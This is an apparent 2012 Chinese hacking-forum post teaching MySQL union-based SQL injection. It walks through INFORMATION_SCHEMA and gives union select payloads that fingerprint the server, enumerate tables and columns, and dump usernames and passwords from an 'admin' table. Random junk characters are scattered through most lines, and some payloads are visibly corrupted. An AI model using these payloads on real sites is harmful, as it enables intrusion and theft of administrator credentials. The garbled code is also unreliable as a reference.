找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1850|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法% ?+ j. P" n' x

  l+ @  J4 w/ Z8 w学习盲注前先了解下 IFORMATION_SCHEMA 库
8 z* Y. o; T9 T# Z" h. l7 Z- y% ^5 h+ M& m
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有- k4 J: w+ P4 R. h; j/ U2 W& ^) `
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
! J1 \* W, v. q* C2 k5 \1.得到所有数据库名:
3 V+ ^/ H2 L5 {: l|SCHEMATA ->存储数据库名的表
: v2 G5 S, }% c* J; K|---字段:SCHEMA_NAME ->数据库名称
& ?; h0 B0 @0 ^8 N2 I$ p& H6 E  F. ^& E. `( A
|TABLES ->存储表名
. K. _/ m+ O0 \5 ~|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名5 V3 P  N) T1 \% t8 T- I
|---字段:TABLE_NAME ->存储表的表名* T) o3 r: T3 q0 p

" w* o( d( ]/ t+ ], p& O8 L; w|COLUMNS ->存储的字段名表
0 E- `1 i1 H& q7 R/ z+ [3 s|---字段:TABLE_SCHEMA ->该字段所属数据库名% b0 F. s: R- I# ]: a$ \
|---字段:TABLE_NAME ->存储所属表的名称
- B- v# }+ @  l) q2 O% G. L0 N' J9 @
|---字段:COLUMN_NAME ->该字段的名称
( O1 y1 A- V" o1 S" T* }
1 R5 E2 }& {0 I; ?4 Q" S 0 z9 ^+ p* G" I3 {- |% j6 U1 V  W
( V3 H+ h% s; G3 f1 T
###########################################################################& ~* u8 P4 c0 O$ o) B0 ]4 P

3 k) @8 G6 F2 G$ C2 N% d% s0x001 获取系统信息:
; }- C% |! _) Q% K0 D/ O& S; d9 Y
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*: U& D- z: K( j8 ^$ m9 o
9 Y8 h$ a0 K. ~' d
/*
5 o( J1 I* ^/ j" c4 g( p
3 [5 u4 y; h9 ^9 L4 ?/ t; H@@global.version_compile_os 获取系统版本
( P; w, n, G2 u0 W/ r2 E% N- P
5 B& o2 V) `: x5 H; u@@datadir 数据库路径
' g6 J. y* J  U5 [database() 当前数据库名称
* x4 G4 F! \* X2 t0x3c62723e 换行HEX值
( g7 @5 \" }& t$ n
1 r# A9 f+ a4 S7 T*/
+ R$ z6 C* j7 L: W; C& h7 v. u+ ]1 r1 Y# i4 V3 ^3 `4 \
! m& h5 S5 r( D+ j$ Z6 c
4 ]8 L! _% a* D
######################################################################
  b& s' D  L' H) f' K/ ^' x1 G+ b9 m- d- M& P& `+ l
0x002 获取表名
( K0 }- y3 H6 G! N* H
- k8 [1 K. ?/ w4 s! z( m8 Z3 {7 d! _union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
4 ^( V( u1 {; |8 o! o8 \$ T$ V2 W# B0 ]/ ?

% O, n( U0 e, ]2 P% m2 z3 x
0 [" s. u% y+ ?6 b. P3 t1 e/*
9 N8 V! b5 ?+ M2 X  h2 e# t2 b+ }0 M! Q+ t; V$ D
0x67617264656e 为当前数据库名
  l6 c' c+ j; t# d, I) l
2 @2 ]9 j- M& z% M8 N1 c" Y2 Xgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
# u9 @+ x2 [0 X2 ~$ ^) h9 ~9 A5 M  k+ @) @0 S$ ]8 x
*/
0 @; b1 I: _3 Z7 }) v3 m! I( z/ w$ e! T/ \2 \2 f# ^' t
######################################################################. q  a! D$ x  b; n' T* z

9 U& _7 k8 h2 Q% V8 _/ }
9 Z* i: a+ Q$ K6 b  _+ _# \
3 l; a4 N" e7 V% t9 k" q0x003 获取字段
( }0 y, c4 ~1 n  Y/ M1 m. R* c/ ?& i0 m2 K$ q) n
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*+ C0 }: \$ x1 o4 t+ x
# K) T6 ?& K7 i
/*
8 o! O) \3 X, R7 p) s7 R/ y5 p( U5 m! W- x- d* M- v8 I
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
$ O) i6 z7 x& B3 C
% {: T8 k. y2 A, \3 I* H8 F0x61646d696e ->选择一个表
4 y+ O+ k& `5 F8 y4 }" A4 F4 v! Z7 J& @: z% O* v. R" h
0x67617264656e ->数据库名
5 j% U" _: \; b& Z& H7 K' K% l6 {/ e
*/
) r6 U. T* `- M. }; x& w0 K; S, {" P
#####################################################################
3 @% S3 v, |4 \6 I
/ q' ?+ D" b! g& H
' ^) e2 n. r1 p  V9 x
. n4 K4 Z3 h) |8 a; V0x004 获取数据
  o7 \+ U2 s7 f% G# S
' K$ h  S( V3 }! g( U  t' Ounion select 1,2,34 B; V% }# t& a3 V
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin0 e8 _  D9 @2 v, {# a9 v, q7 F

5 }$ G: J9 }* z' c$ {union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
2 h& r2 w- k0 [) e. s) j0 g5 {/ C7 k+ W2 h) E! k# O- ~

; U) b  n2 W# y6 {0 L
' ]4 a, {5 ]# S5 ]/*
, O. y+ r  v0 Y6 t% R/ X# ~9 i5 k% `
0x3c62723e 换行符号HEX编码" u3 A9 R2 n- ^3 _
9 @3 d  c  i; L1 _; K7 f, L0 h
group_concat 同时获得该字段所有数据
: i: W5 u( b. r1 M4 ~$ E0 z7 R# y7 i- b1 w' K
*/
' L- a, M  g$ D( O3 W+ L' b; A7 x  S0 |! {, q% o( q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表